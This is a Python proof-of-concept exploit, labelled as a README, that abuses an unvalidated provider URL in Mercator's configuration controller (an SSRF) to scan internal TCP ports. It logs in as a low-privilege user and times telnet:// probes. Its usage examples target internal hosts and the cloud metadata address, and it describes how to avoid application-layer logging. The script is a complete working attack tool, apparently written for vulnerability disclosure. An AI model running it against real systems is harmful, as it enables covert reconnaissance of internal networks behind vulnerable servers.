README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Mercator SSRF Port Scanner — TCP port enumeration via the unvalidated
`provider` URL of `ConfigurationController::testProvider`.
Method
------
The vulnerable controller calls libcurl on the attacker-supplied URL with
a 10-second timeout. By using the `telnet://` scheme, libcurl performs a
plain TCP connection and waits for the server to speak first — sending no
application-layer payload at all. Two observable outcomes:
* TCP RST received quickly (~0.15 s) -> CLOSED port is not accepting connections
* No reply within 10 seconds (~10 s) -> OPEN port accepted the TCP connection
Because no HTTP, gopher, Redis or other protocol bytes are sent, the scan
is essentially invisible to application-layer logs on the target — only
the raw TCP handshake is visible. In rare environments a firewall that
silently drops packets ("filter") will also produce OPEN; this is an
acceptable ambiguity for enumeration purposes.
Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role (`PermissionRoleTableSeeder.php`), so a regular
low-privilege account is sufficient.
Usage
-----
./bin/python3 ssrf_portscan.py \\
--base http://127.0.0.1:8000 \\
--user lowuser --password 'Lowuser123!' \\
--target 127.0.0.1 --ports 22,80,443,3306,6379,8000
# Port range
./bin/python3 ssrf_portscan.py ... --target 10.0.0.5 --ports 1-1024
# Explicit list of host:port (each entry MUST carry a port)
./bin/python3 ssrf_portscan.py ... --endpoints 169.254.169.254:80,10.0.0.5:6379
"""
import argparse
import re
import sys
import time
import warnings
# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")
import requests
import urllib3
urllib3.disable_warnings()
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
# Threshold (seconds). Below = TCP RST received fast (CLOSED). Above = curl
# hit its 10s timeout (OPEN/filtered). Local-loop RSTs round-trip <0.5s; we
# leave a comfortable margin.
OPEN_THRESHOLD = 8.0
# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────
def log(message):
"""Status banner — emitted on stderr so stdout stays pure result data."""
print(message, file=sys.stderr)
def die(message):
log(f"[!] {message}")
sys.exit(1)
def login(session, base, user, password):
"""Authenticate, print the login section, and return the CSRF token."""
r = session.get(f"{base}/login", timeout=10)
m = LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found on /login")
r = session.post(
f"{base}/login",
data={"_token": m.group(1), "login": user, "password": password},
timeout=10, allow_redirects=True,
)
if r.url.rstrip("/").endswith("/login"):
die(f"authentication failed for '{user}'")
m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found after login")
csrf = m.group(1)
log("[+] login")
log(f" user : {user}")
for c in session.cookies:
log(f" cookie : {c.name}={c.value}")
log(f" csrf token : {csrf}")
return csrf
# ── SSRF port scan ──────────────────────────────────────────────────────────
def require_configure(session, base):
"""Confirm the account holds the `configure` permission."""
r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
if r.status_code == 403:
die("account lacks the 'configure' permission")
def probe(session, base, csrf, target):
"""Send one telnet:// probe. Return (state, elapsed_seconds)."""
t0 = time.perf_counter()
session.post(
f"{base}/admin/config/parameters",
data={
"_token": csrf,
"_method": "PUT",
"active_tab": "cve",
"action": "test_provider",
"provider": f"telnet://{target}#",
},
allow_redirects=False, timeout=15,
)
session.get(f"{base}/admin/config/parameters?tab=cve")
elapsed = time.perf_counter() - t0
return ("OPEN" if elapsed > OPEN_THRESHOLD else "CLOSED"), elapsed
def parse_ports(spec):
out = []
try:
for chunk in spec.split(","):
chunk = chunk.strip()
if not chunk:
continue
if "-" in chunk:
a, b = chunk.split("-", 1)
out.extend(range(int(a), int(b) + 1))
else:
out.append(int(chunk))
except ValueError:
die(f"invalid --ports spec {spec!r} (expected e.g. '22,80,443' or '1-1024')")
seen = set()
return [p for p in out if not (p in seen or seen.add(p))]
def build_targets(args):
if args.endpoints:
out = [t.strip() for t in args.endpoints.split(",") if t.strip()]
# telnet:// has no port -> libcurl falls back to 23, silently
# mis-scanning. Refuse port-less endpoints rather than lie.
bad = [t for t in out if ":" not in t.rsplit("]", 1)[-1]]
if bad:
die(f"--endpoints entries need an explicit ':port' -> {', '.join(bad)} "
f"(use --target {bad[0]} --ports <list> to scan a host)")
return out
if not args.target or not args.ports:
die("need --endpoints, or --target + --ports")
return [f"{args.target}:{p}" for p in parse_ports(args.ports)]
def main():
ap = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
ap.add_argument("--user", required=True, help="account login")
ap.add_argument("--password", required=True)
ap.add_argument("--target", help="host scanned (combined with --ports)")
ap.add_argument("--ports", help="port list/range, e.g. '22,80,443' or '1-1024'")
ap.add_argument("--endpoints",
help="explicit 'host:port,host:port,...' (each needs a port)")
ap.add_argument("--delay", type=float, default=0.0,
help="seconds to sleep between probes (default: 0)")
args = ap.parse_args()
targets = build_targets(args)
session = requests.Session()
session.verify = False
csrf = login(session, args.base, args.user, args.password)
require_configure(session, args.base)
log(f"[*] scanning {len(targets)} target(s) via SSRF telnet probe")
print(f"{'TARGET':<28} {'STATE':<8} TIME")
print("-" * 50)
for t in targets:
try:
state, elapsed = probe(session, args.base, csrf, t)
except requests.RequestException as e:
print(f"{t:<28} {'ERROR':<8} {e}")
continue
print(f"{t:<28} {state:<8} {elapsed:.2f}s")
if args.delay > 0:
time.sleep(args.delay)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
die("interrupted")
except requests.RequestException as e:
die(f"could not reach Mercator: {e}")